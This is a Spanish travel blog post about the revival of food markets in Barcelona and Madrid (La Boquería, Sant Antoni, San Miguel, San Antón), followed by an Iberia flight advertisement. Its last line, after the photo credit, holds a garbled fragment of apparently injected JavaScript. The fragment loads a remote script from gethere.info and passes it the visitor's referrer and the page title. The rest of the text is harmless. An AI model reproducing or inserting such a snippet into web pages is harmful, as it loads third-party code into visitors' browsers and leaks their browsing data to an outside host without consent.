El revivir de los mercados

29/08/2011

Seguro que tiene esta imagen grabada en el cerebro: su madre o su abuela yendo al mercado con el capazo para hacer la compra del día, desde las frutas y verduras, hasta el pescado o la carne. Todo. Hasta la década de 1980 era normal acudir al mercado y revisar el género fresco del día. Más tarde, con la incorporación de la mujer al trabajo y el estrés propio del ritmo de vida, los mercados nos parecieron algo del pasado. Pero todo vuelve.

Desde hace unos años los mercados viven un resurgir. Quizá porque queremos cuidarnos y llevar un estilo de vida slow. Y en ese renacimiento ya no solo hay cabida para los productos de la compra. Ahora los mercados incorporan delicatessen, restaurantes y bares de tapas modernas. Venga, vamos abriendo boca.

  • La Boquería. Es la madre de todos los mercados. A un lado de las ramblas de Barcelona, este espacio de cubiertas de hierro hace las delicias de vecinos y turistas. Lo mismo te encuentras a la señora del Raval que viene a comprar un pescado para cocinarlo al horno que a un inglés asado de calor que se compra un paquete de macedonia de fruta fresca. También tiene una zona de dulces ante los que es imposible resistirse. La Boquería es un festival de colores,  olores y acentos.
  • Sant Antoni. También en la ciudad condal, pero en una zona menos turística. Guarda el mismo espíritu de La Boquería, pero más auténtico y de barrio. En el pequeño bar de tapas uno se puede tomar un aperitivo con una cerveza bien fresca después de ver todos los puestos. Aproveche para curiosear en el puesto de embutidos y llevarse algo típico, como la butifarra catalana. Los domingos por la mañana, justo fuera, la oferta se completa con un mercado de libros y monedas para coleccionistas.
  • San Miguel. El Madrid de los Austrias tiene más vida desde que hace unos años se reabrió este mercado de hierro del siglo XIX. El aspecto desvencijado y de barrio ha dado paso a una oferta mucho más vanguardista y cosmopolita. Se pueden tomar pinchos con cervezas, unas gambitas con vino blanco, comprar fruta o carne argentina, degustar deliciosos chocolates artesanos o directamente almorzar un menú de cocina de mercado. Pretende ser un centro de cultura culinaria y en él se organizan eventos como clases de cata. Siempre está a rebosar. Imprescindible si usted se considera un foodie.
  • San Antón. Es el nuevo lugar en boga en el centro de Madrid. En pleno barrio de Chueca, el mercado de San Antón anima con su variedad de puestos: una charcutería, una pollería con carnes exóticas, una frutería desde la que twittean las novedades del día, tiendas degustación y showcooking, un restaurante con menús a 12 euros y picoteo a la carta… El ambiente es moderno, pero los precios no son por lo general prohibitivos. La mayor atracción es la terraza, siempre llena de gente, desde la que se observan los tejados de Chueca. Que tenga suerte a la hora de encontrar una mesa libre.

Iberia conecta Madrid con el mundo con más de 500 vuelos diarios desde la T4 del aeropuerto de Barajas. Con el Puente Aéreo, Iberia une Barcelona y Madrid con 30 vuelos diarios por sentido en días laborables, y algunos menos en fin de semana y festivos. Además, a través de sus asociadas, ofrece vuelos a Barcelona desde las principales ciudades españolas y europeas. Los mejores precios en www.iberia.com.

Foto |sincretics.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;